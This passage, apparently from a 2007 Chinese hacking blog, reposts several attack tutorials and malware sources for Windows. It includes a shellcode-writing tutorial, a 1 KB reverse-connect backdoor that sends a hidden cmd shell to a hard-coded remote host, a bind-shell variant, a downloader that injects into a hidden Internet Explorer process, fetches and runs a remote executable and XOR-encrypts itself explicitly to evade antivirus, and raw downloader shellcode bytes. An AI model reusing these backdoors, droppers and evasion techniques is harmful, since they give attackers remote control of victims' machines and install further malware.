rfRemoteDownExecGetProcAddress fnGetProcAddress;
rfRemoteDownExecLoadLibrary fnLoadLibrary;

//必须得传过去的函数名字
char   strURLMon[32];
char   strURLDownloadToFileA[32];
DownInfo di;
};

typedef struct _STARTUPINFOW {
  DWORD   cb; 0x90
  LPWSTR lpReserved; 94
  LPWSTR lpDesktop; 98
  LPWSTR lpTitle; 9c
  DWORD   dwX;a0
  DWORD   dwY;a4
  DWORD   dwXSize;a8
  DWORD   dwYSize;ac
  DWORD   dwXCountChars;b0
  DWORD   dwYCountChars;b4
  DWORD   dwFillAttribute;b8
  DWORD   dwFlags;bc
  WORD   wShowWindow;be
  WORD   cbReserved2;e0
  LPBYTE lpReserved2;
  HANDLE hStdInput;
  HANDLE hStdOutput;
  HANDLE hStdError;
} STARTUPINFOW, *LPSTARTUPINFOW;

typedef struct _PROCESS_INFORMATION {
  HANDLE hProcess;
  HANDLE hThread;
  DWORD dwProcessId;
  DWORD dwThreadId;
} PROCESS_INFORMATION
*/

  buff中的这段是注入IE的代码(如下):

Copy code

      "\x56\x8B\x74\x24\x08\x8D\x46\x08\x50\xFF\x56\x04\x8D\x4E\x28\x51"
"\x50\xFF\x16\x8B\x96\xE0\x00\x00\x00\x8B\x8E\xDC\x00\x00\x00\x52"
"\x51\x8D\x96\xCC\x00\x00\x00\x52\x8B\x56\x48\x8D\x4E\x4C\x51\x52"
"\xFF\xD0\xB8\x01\x00\x00\x00\x5E\xC2\x04\x00\xCC\xCC\xCC\xCC\xCC"

C代码原型如下，para为注入IE的远线程的参数：

Copy code

struct DownInfo
{
DWORD caller;
char         url[128];
char         filename[16];
DWORD reserved;
DWORD callbacker;
};

struct Param
{
FARPROC ptrGetProcAddress;
FARPROC ptrLoadLibrary;

char   strURLMon[32];
char   strURLDownloadToFileA[32];
DownInfo di;
};

DWORD WINAPI RemoteDownExecThread(void *para)
{
Param *pa=(Param *)para;
HMODULE hModule = pa->ptrLoadLibrary(pa->strURLMon);
FARPROC ptrURLDownloadToFileA = (FARPROC)pa->ptrGetProcAddress(hModule, rp->strURLDownloadToFileA);

ptrURLDownloadToFileA(pa->di.caller,pa->di.url,pa->di.filename,pa->di.reserved,pa->di.callbacker);

return true;
}

然后调用CreateRemoteThread，搞定.
看了一下,文章貌似有点长，在最后顺便打个小广告，欢迎大家访问我的博客:www.gyzy.org,大家也看到了，测试程序就是http://www.xyzreg.net/gyzy.exe,嘿嘿，人穷志短呐，只能暂时住在xyzreg家了，感谢xyzreg。另外，参考了Swan的《远线程删除自身》，在此一并感谢.转载记得保留版权信息

打造Windows下自己的ShellCode

wuhan2001@hotmail.com(夜星海) — Sat,10 Nov 2007 02:16:45 +0800

　　适合读者：漏洞分析员、黑迷

　　前置知识：汇编阅读能力，漏洞调试基本步骤，VC使用方法

　　WTF：这几次的菜鸟版EXP系列文章都是重点讲解溢出编程的原理和思路，包括漏洞的定位，利用构造以及遇到限制时ShellCode的编码技巧等，但对ShellCode本身的编写，特别是Windows环境下ShellCode的初步编写，却很少提及。在文章中都是说发扬“拿来主义”，看准外面现成的ShellCode，直接拿来用，对不合规范的地方稍微改改就成——其实我们是有策略的，试想一来就一大堆汇编，初学者不晕就懵，不被吓跑才怪，所以前期重点放在激发大家的兴趣上。但作为一个菜鸟，在兴趣激起来后，毕竟要进入到ShellCode的编写中。一是因为Exploit很大的乐趣就在于ShellCode的编写，二是明白了ShellCode的编写，才能更好的使用和改进外面的代码。那，我们开始……

　　打造Windows下自己的ShellCode

　　文/图王炜/ww0830

　　为了帮助初学者了解ShellCode的编写，并能一步一步操作得到自己的ShellCode，因此将Windows下ShellCode的编写过程作详细的介绍，以利于像我一样的菜鸟，最终能够写出简单的但却是真实的ShellCode；而进一步高级的ShellCode的编写，也会在系列后面的文章中一步一步的演示的，希望大家会发现，Exp真好，ShellCode最美妙！

　　ShellCode简介和编写步骤

　　

　　从以前的文章和别人的攻击代码中可以知道，ShellCode是以“\xFF\x3A\x45\x72……”的形式出现在程序中的，而Exploit的构造就是想方设法地使计算机能转到我们的ShellCode上来，去执行“\xFF\x3A\x45\x72……”――由此看出，ShellCode才是Exploit攻击的真正主宰（就如同独行者是我们文章的主宰一样）。而ShellCode的“\xFF\x3A\x45\x72……”那些值，其实是机器码的形式，和一般程序在里面存的东东是没什么两样的，攻击程序把内存里面的数据动态改成ShellCode的值，再跳过去执行，就如同执行一个在内存中的一般程序一样，只不过完成的是我们的功能，溢出攻击就这样实现了。

　　在此可以下个定义：ShellCode就是一段程序的机器码形式，而ShellCode的编写过程，就是得到我们想要程序的机器码的过程。

　　当然ShellCode的特殊性和Windows下函数调用的特点，决定了和一般的汇编程序有所不同。所以其编写步骤应该是，

　　1．构想ShellCode的功能；

　　2．用C语言验证实现；

　　3．根据C语言实现，改成带有ShellCode特点的汇编；

　　4．最后得到机器码形式的ShellCode。

　　其中最重要的是第三步――改成有ShellCode特点的汇编，将在本文的后面讲到。

　　首先第一步是构想ShellCode的功能。我们想要的功能可能是植入木马，杀掉防火墙，倒流时光，发电磁波找外星人等等（WTF：咳……），但最基本的功能，还是希望开一个DOS窗口，那我们可以在DOS窗口中做很多事情，所以先介绍开DOS窗口ShellCode的写法吧。

　　C语言代码

　　比如下面这个程序就可以完成开DOS窗口的功能，大家详细看下注释：

　　#include

　　#include

　　typedef void (*MYPROC)(LPTSTR);  //定义函数指针

　　int main()

　　{

　　HINSTANCE LibHandle;

　　MYPROC ProcAdd;

　　LibHandle = LoadLibrary(“msv.dll”);

　　ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System"); //查找System函数地址

　　(ProcAdd) ("command.com");  //其实就是执行System(“command.com”)

　　return 0;

　　}

　　    其实执行System(“command.com”)也可以完成开DOS窗口的功能，写成这么复杂是有原因的，解释一下该程序：首先Typedef void (*MYPROC)(LPTSTR)是定义一个函数指针类型，该类型的函数参数为是字符串，返回值为空。接着定义MYPROC ProcAdd，使ProcAdd为指向参数为是字符串，返回值为空的函数指针；使用LoadLibrary(“msvcrt.dll”);装载动态链接库msvcrt.dll；再使用ProcAdd = (MYPROC) GetProcAddress(LibHandle, System)获得 System的真实地址并赋给ProcAdd，之后ProcAdd里存的就是System函数的地址，以后使用这个地址来调用System函数；最后(ProcAdd) ("command.com")就是调用System("command.com")，可以获得一个DOS窗口。在窗口中我们可以执行Dir，Copy等命令。如下图1所示。

　　

　　图1

　　 获得函数的地址

　　

　　程序中用GetProcAddress函数获得System的真实地址，但地址究竟是多少，如何查看呢？

　　在VC中，我们按F10进入调试状态，然后在Debug工具栏中点最后一个按钮Disassemble和第四个按钮Registers，这样出现了源程序的汇编代码和寄存器状态窗口，如图2所示

　　

　　图2

　　继续按F10执行，直到到ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System")语句下的Cll dword ptr [__imp__GetProcAddress@8 (00424194)]执行后，EAX变为7801AFC3，说明在我的机器上System( )函数的地址是0x7801AFC3。如图3所示。

　　

　　图3

　　WTF：注意本次测试中读者的机器是Windows 2000 SP3，不同环境可能地址不同。

　　为什么EAX就是System( )函数的地址呢？那是因为函数执行的返回值，在汇编下通常是放在EAX中的，这算是计算机系统的约定吧，所以GetProcAddress（”System”）的返回值（System函数的地址），就在EAX中，为0x7801AFC3。

　　 Windows下函数的调用原理

　　

　　为什么要这么麻烦的得到System函数的地址呢？这是因为在Windows下，函数的调用方法是先将参数从右到左压入堆栈，然后Call该函数的地址。比如执行函数Fun（argv1, argv2），先把参数从右到左压入堆栈，这里就是依次把argv2，argv1压入堆栈里，然后Call Fun函数的地址。这里的Call Fun函数地址，其实等于两步，一是把保存当前EIP，二是跳到Func函数的地址执行，即Push  EIP ＋ Jmp Fun。其过程如下图4所示。

　　

　　图4

　　同理，我们要执行System("command.com")：首先参数入栈，这里只有一个参数，所以就把Command.com的地址压入堆栈，注意是Command.com字符串的地址；然后Call System函数的地址，就完成了执行。如图5所示。

　　

　　图5

　　构造有ShellCode特点的汇编

　　

　　明白了Windows函数的执行原理，我们要执行System(“Command.exe”)，就要先把Command.exe字符串的地址入栈，但Command.exe字符串在哪儿呢？内存中可能没有，但我们可以自己构造！

　　我们把‘Command.exe’一个字符一个字符的赋给堆栈，这样‘Command.exe’字符串就有了，而栈顶的指针ESP正好是Command.exe字符串的地址，我们Push esp，就完成了参数――Command.exe字符串的地址入栈。如下图6所示。

　　

　　图6

　　参数入栈了，然后该Call System函数的地址。刚才已经看到，在Windows 2000 SP3上，System函数的地址为0x7801AFC3，所以Call 0x7801AFC3就行了。

　　把思路合起来，可以写出执行System(“Command.exe”)的带有ShellCode特点的汇编代码如下。

　　mov esp,ebp ;

　　push ebp ;

　　mov ebp,esp ;    把当前esp赋给ebp

　　xor edi,edi ;

　　push edi ;压入0，esp－4,; 作用是构造字符串的结尾\0字符。

　　sub esp,08h ;加上上面，一共有12个字节,;用来放"command.com"。

　　mov byte ptr [ebp-0ch],63h ;  c

　　mov byte ptr [ebp-0bh],6fh ;  o

　　mov byte ptr [ebp-0ah],6dh ;  m

　　mov byte ptr [ebp-09h],6Dh ;  m

　　mov byte ptr [ebp-08h],61h ;  a

　　mov byte ptr [ebp-07h],6eh ;  n

　　mov byte ptr [ebp-06h],64h ;  d

　　mov byte ptr [ebp-05h],2Eh ;  .

　　mov byte ptr [ebp-04h],63h ;  c

　　mov byte ptr [ebp-03h],6fh ;  o

　　mov byte ptr [ebp-02h],6dh ;  m一个一个生成串"command.com".

　　lea eax,[ebp-0ch] ;

　　push eax ;    command.com串地址作为参数入栈

　　mov eax, 0x7801AFC3 ;

　　call eax ;     call System函数的地址

　　明白了原理再看实现，是不是清楚了很多呢？

　　提取ShellCode

　　

　　首先来验证一下，在VC中可以用__asm关键字插入汇编，我们把System(“Command.exe”)用我们写的汇编替换，LoadLibrary先不动，然后执行，成功！弹出了我们想要的DOS窗口。如下图7所示。

　　

　　图7

　　同样的道理，LoadLibrary(“msvcrt.dll”)也仿照上面改成汇编，注意LoadLibrary在Windows 2000 SP3上的地址为0x77e69f64。把两段汇编合起来，将其编译、链接、执行，也成功了！如下图8所示。

　　

　　图8

　　有了上面的工作，提取ShellCode就只剩下体力活了。我们对刚才的全汇编的程序，按F10进入调试，接着按下Debug工具栏的Disassembly按钮，点右键，在弹出菜单中选中Code Bytes，就出现汇编对应的机器码。因为汇编可以完全完成我们的功能，所以我们把汇编对应的机器码原封不动抄下来，就得到我们想要的ShellCode了。提取出来的ShellCode如下。

　　unsigned char shellcode[] =

　　"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"

　　"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"

　　"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"

　　"\x64\x9f\xE6\x77"  //sp3 loadlibrary地址0x77e69f64

　　"\x52\x8D\x45\xF4\x50"

　　"\xFF\x55\xF0"

　　"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"

　　"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"

　　"\x50\xB8"

　　"\xc3\xaf\x01\x78"  //sp3 System地址0x7801afc3

　　"\xFF\xD0";

　　 验证ShellCode

　　

　　最后要验证提取出来的ShellCode能否完成我们的功能。在以前的文章中已经说过方法，只需要新建一个工程和c源文件，然后把ShellCode部分拷下来，存为一个数组，最后在main中添上( (void(*)(void)) &shellcode )()，如下：

　　unsigned char shellcode[] =

　　"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"

　　"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"

　　"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"

　　"\x64\x9f\xE6\x77"  //sp3 loadlibrary地址0x77e69f64

　　"\x52\x8D\x45\xF4\x50"

　　"\xFF\x55\xF0"

　　"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"

　　"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"

　　"\x50\xB8"

　　"\xc3\xaf\x01\x78"  //sp3 System地址0x7801afc3

　　"\xFF\xD0";

　　int main()

　　{

　　( (void(*)(void)) &shellcode )()

　　return 0;

　　}

　　    ( (void(*)(void)) &shellcode )()这句话是关键，它把ShellCode转换成一个参数为空，返回为空的函数指针，并调用它。执行那句就相当于执行ShellCode数组里的那些数据。如果ShellCode正确，就会完成我们想要的功能，出现一个DOS窗口。我们亲自编写的第一个ShellCode成功完成！

　　小结

　　

　　这个ShellCode的功能还比较单薄，而且通用性也待进一步研究，但的确是一个由我们亲自打造出来的ShellCode，而且现实中的ShellCode也是这样写出来的。只要我们掌握了基本的方法，以后就可以在广阔的空间中自由翱翔！

1k正反向连接,零管道后门

wuhan2001@hotmail.com(夜星海) — Sat,10 Nov 2007 01:47:06 +0800

作者：Anskya

1k(程序体积1kb) 反向连接,零管道后门

写ShellCode的时候写的~C版本代码~~没用就丢出来了~

CODE:

/*
  1k(程序体积1kb) 反向连接,零管道后门 By Anskya

说明:
  不用我多说了吧..黑客一般都会使用的后门程序..
  这里只是简单的演示一下..没有添加进程隐藏功能
  程序可以在Win9x,Win2k,WinXP,Win2k3上使用
  程序体积只有1k(FSG压缩一下会更小)

测试:
  本地开启NetCat等工具,监听80端口,会返回一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
#pragma comment(lib, "ws2_32.lib")

#include
#include

#define MasterAddr "DNA32r.3322.org"   //连接地址
#define MasterPort 80             //连接端口

void Entrypoint()
{
  WSADATA WSADa;
  LPHOSTENT HostEnts;
  sockaddr_in SockAddrIn;
  SOCKET FSocket;

  PROCESS_INFORMATION ProcessInfo;
  STARTUPINFO StartupInfo;

  char szCMDPath[255];
//-------------------
  ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
  ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
  ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
  GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
  //获取cmd路径
  WSAStartup(0x0202,&WSADa);
  //加载ws2_32.dll
  HostEnts=gethostbyname(MasterAddr);
  SockAddrIn.sin_family = AF_INET;
  SockAddrIn.sin_addr = *((LPIN_ADDR)*HostEnts->h_addr_list);
  SockAddrIn.sin_port = htons(MasterPort);
  FSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
  //获取远程地址和端口～绑定协议
  connect(FSocket, (LPSOCKADDR)&SockAddrIn,sizeof(SockAddrIn));
  //开始连接远程服务器
  StartupInfo.cb = sizeof(STARTUPINFO);
  StartupInfo.wShowWindow = SW_HIDE;
  StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  StartupInfo.hStdInput = (HANDLE)FSocket;
  StartupInfo.hStdOutput = (HANDLE)FSocket;
  StartupInfo.hStdError = (HANDLE)FSocket;
  //创建匿名管道
  CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
  WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
  CloseHandle(ProcessInfo.hProcess);
  CloseHandle(ProcessInfo.hThread);
  //关闭进程句柄
  closesocket(FSocket);
  WSACleanup();
  //关闭连接卸载ws2_32.dll
}

1k(程序体积1kb)正向连接,零管道后门 [VC代码]

VC好爽~(编译器和连接器都很爽~~)如果~~编译速度再快点就更好了~
感慨....最爽的还是~VC的调试器和反汇编器~~呵呵

CODE:

/*
  1k(程序体积1kb)正向连接,零管道后门 By Anskya

说明:
  不用我多说了吧..黑客一般都会使用的后门程序..
  这里只是简单的演示一下..没有添加进程隐藏功能
  程序可以在Win9x,Win2k,WinXP,Win2k3上使用
  程序体积只有1k(FSG压缩一下会更小)

测试:
  本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
#pragma comment(lib, "ws2_32.lib")

#include
#include

#define MasterPort 80             //连接端口

void Entrypoint()
{
  WSADATA WSADa;
  sockaddr_in SockAddrIn;
  SOCKET CSocket,SSocket;
  int iAddrSize;

  PROCESS_INFORMATION ProcessInfo;
  STARTUPINFO StartupInfo;

  char szCMDPath[255];
//-------------------
  ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
  ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
  ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
  //获取cmd路径
  GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
  //加载ws2_32.dll
  WSAStartup(0x0202,&WSADa);

  //设置本地信息和绑定协议
  SockAddrIn.sin_family = AF_INET;
  SockAddrIn.sin_addr.s_addr = INADDR_ANY;
  SockAddrIn.sin_port = htons(MasterPort);
  CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

  //绑定端口
  bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
  listen(CSocket,1);
  iAddrSize = sizeof(SockAddrIn);
  SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
  //开始连接远程服务器
  StartupInfo.cb = sizeof(STARTUPINFO);
  StartupInfo.wShowWindow = SW_HIDE;
  StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  StartupInfo.hStdInput = (HANDLE)SSocket;
  StartupInfo.hStdOutput = (HANDLE)SSocket;
  StartupInfo.hStdError = (HANDLE)SSocket;
  //创建匿名管道
  CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
  WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
  CloseHandle(ProcessInfo.hProcess);
  CloseHandle(ProcessInfo.hThread);
  //关闭进程句柄
  closesocket(CSocket);
  closesocket(SSocket);
  WSACleanup();
  //关闭连接卸载ws2_32.dll
}

无Dll插入进程，下载者VC源代码

wuhan2001@hotmail.com(夜星海) — Sat,10 Nov 2007 01:43:15 +0800

增加代码xor解密功能,以逃过杀毒软件.

生成MiNI下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.

参考delphi版本的下载者源代码，编出来有16K左右。压缩也有10K多，
于是写了VC的代码。按以下的设置，编译出来2K左右。
还可以可以再设置一下编译开关，以减小体积。

Ps:原代码中4处没有对\转义,以下代码编译通过;
编译出来16K,去掉4行注释,编译后3K(编译环境:Win2003+VC6.0)
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/OPT:NOWIN98") //取消这4行的注释，可编译出2K大的文件
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")

HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //建立远程线程,并运行
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;

void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");

(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};

void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));

GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);

//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;

Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); //确定起始基址和内存映像基址的位置

//4.写内存，创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行

//5.关闭对象
CloseHandle(processhandle);

return;
} ;

//解密函数
void decrpt()
{

HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;

};

//解密搬回
int i;
for (i=1;i<=0xFF;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;

};

//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)

{

};

}
return;
};

通用ShellCode大全

wuhan2001@hotmail.com(夜星海) — Sat,10 Nov 2007 01:39:26 +0800

Anskya:

Downloader 411字节

可以运行在WIndows ALL
1.代码自定位
2.获取k32基址
3.动态搜索API
4.平衡堆践

PS:都是Virus 编程技术...

CODE:

unsigned char ShellCode[] =
{
   0xE8,0x00,0x00,0x00,0x00,0x5F,0x81,0xEF,
   0x1E,0x10,0x40,0x00,0x8D,0x87,0xAD,0x10,
   0x40,0x00,0x50,0xE8,0x9B,0x00,0x00,0x00,
   0x8D,0x87,0xBD,0x10,0x40,0x00,0x50,0xE8,
   0x8F,0x00,0x00,0x00,0x33,0xC0,0x6A,0x00,
   0x6A,0x00,0x8D,0x9F,0x98,0x10,0x40,0x00,
   0x53,0x8D,0x9F,0x79,0x10,0x40,0x00,0x53,
   0x6A,0x00,0xFF,0x97,0xC4,0x10,0x40,0x00,
   0x6A,0x05,0x6A,0x00,0x6A,0x00,0x8D,0x9F,
   0x98,0x10,0x40,0x00,0x53,0x8D,0x9F,0xA8,
   0x10,0x40,0x00,0x53,0x6A,0x00,0xFF,0x97,
   0xB5,0x10,0x40,0x00,0xC9,0xC2,0x08,0x00,
   0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x57,
   0x77,0x77,0x2E,0x41,0x6E,0x73,0x6B,0x79,
   0x61,0x2E,0x4E,0x65,0x74,0x2F,0x54,0x65,
   0x73,0x74,0x2E,0x65,0x78,0x65,0x00,0x43,
   0x3A,0x5C,0x64,0x6F,0x77,0x6E,0x6C,0x6F,
   0x61,0x64,0x2E,0x65,0x78,0x65,0x00,0x4F,
   0x70,0x65,0x6E,0x00,0x73,0x68,0x65,0x6C,
   0x6C,0x33,0x32,0x00,0x8B,0x98,0x8A,0x31,
   0x00,0x00,0x00,0x00,0x75,0x72,0x6C,0x6D,
   0x6F,0x6E,0x00,0x19,0xD4,0xC3,0x92,0x00,
   0x00,0x00,0x00,0x60,0x8B,0x74,0x24,0x24,
   0xE8,0x97,0x00,0x00,0x00,0x68,0xAD,0xD1,
   0x34,0x41,0x50,0xE8,0x1F,0x00,0x00,0x00,
   0x56,0xFF,0xD0,0x8B,0xD8,0x2B,0xC0,0xAC,
   0x84,0xC0,0x75,0xFB,0x8B,0xFE,0xAD,0x85,
   0xC0,0x74,0x0A,0x50,0x53,0xE8,0x05,0x00,
   0x00,0x00,0xAB,0xEB,0xF1,0x61,0xC3,0x60,
   0x8B,0x5C,0x24,0x24,0x8B,0x74,0x24,0x28,
   0x2B,0xED,0x8B,0xD3,0x03,0x52,0x3C,0x8B,
   0x52,0x78,0x03,0xD3,0x8B,0x42,0x18,0x8B,
   0x7A,0x1C,0x03,0xFB,0x8B,0x7A,0x20,0x03,
   0xFB,0x52,0x8B,0xD7,0x8B,0x17,0x03,0xD3,
   0x45,0x60,0x8B,0xF2,0x2B,0xC9,0xAC,0x41,
   0x84,0xC0,0x75,0xFA,0x89,0x4C,0x24,0x18,
   0x61,0x60,0x2B,0xC0,0xE8,0x51,0x00,0x00,
   0x00,0x3B,0xC6,0x61,0x74,0x08,0x83,0xC7,
   0x04,0x48,0x74,0x18,0xEB,0xD6,0x5A,0x4D,
   0x8B,0x4A,0x24,0x03,0xCB,0x0F,0xB7,0x04,
   0x69,0x8B,0x6A,0x1C,0x03,0xEB,0x8B,0x44,
   0x85,0x00,0x03,0xC3,0x89,0x44,0x24,0x1C,
   0x61,0xC2,0x08,0x00,0x60,0x2B,0xC0,0x64,
   0x8B,0x40,0x30,0x85,0xC0,0x78,0x0C,0x8B,
   0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,
   0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,
   0x7C,0x8B,0x40,0x3C,0x89,0x44,0x24,0x1C,
   0x61,0xC3,0x60,0xE3,0x18,0xF7,0xD0,0x32,
   0x02,0x42,0xB3,0x08,0xD1,0xE8,0x73,0x05,
   0x35,0x20,0x83,0xB8,0xED,0xFE,0xCB,0x75,
   0xF3,0xE2,0xEC,0xF7,0xD0,0x89,0x44,0x24,
   0x1C,0x61,0xC3
};

一个MessageBox窗口[演示]

CODE:

unsigned char ShellCode[] =
{
  0xE8,0x00,0x00,0x00,0x00,0x5F,0x81,0xEF,
  0x1E,0x10,0x40,0x00,0x8D,0x87,0x83,0x10,
  0x40,0x00,0x50,0xE8,0x61,0x00,0x00,0x00,
  0x33,0xC0,0x6A,0x00,0x8D,0x87,0x72,0x10,
  0x40,0x00,0x50,0x8D,0x87,0x4D,0x10,0x40,
  0x00,0x50,0x6A,0x00,0xFF,0x97,0x8A,0x10,
  0x40,0x00,0x58,0xC3,0x5B,0x2A,0x5D,0x20,
  0x48,0x65,0x6C,0x6C,0x6F,0x20,0x57,0x6F,
  0x72,0x6C,0x64,0x20,0x43,0x6F,0x64,0x65,
  0x72,0x21,0x20,0x28,0x43,0x29,0x20,0x41,
  0x6E,0x73,0x6B,0x79,0x61,0x2E,0x0D,0x0A,
  0x00,0x4D,0x73,0x67,0x42,0x6F,0x78,0x20,
  0x42,0x79,0x20,0x41,0x6E,0x73,0x6B,0x79,
  0x61,0x00,0x75,0x73,0x65,0x72,0x33,0x32,
  0x00,0xF7,0x6C,0x55,0xD8,0x00,0x00,0x00,
  0x00,0x60,0x8B,0x74,0x24,0x24,0xE8,0x97,
  0x00,0x00,0x00,0x68,0xAD,0xD1,0x34,0x41,
  0x50,0xE8,0x1F,0x00,0x00,0x00,0x56,0xFF,
  0xD0,0x8B,0xD8,0x2B,0xC0,0xAC,0x84,0xC0,
  0x75,0xFB,0x8B,0xFE,0xAD,0x85,0xC0,0x74,
  0x0A,0x50,0x53,0xE8,0x05,0x00,0x00,0x00,
  0xAB,0xEB,0xF1,0x61,0xC3,0x60,0x8B,0x5C,
  0x24,0x24,0x8B,0x74,0x24,0x28,0x2B,0xED,
  0x8B,0xD3,0x03,0x52,0x3C,0x8B,0x52,0x78,
  0x03,0xD3,0x8B,0x42,0x18,0x8B,0x7A,0x1C,
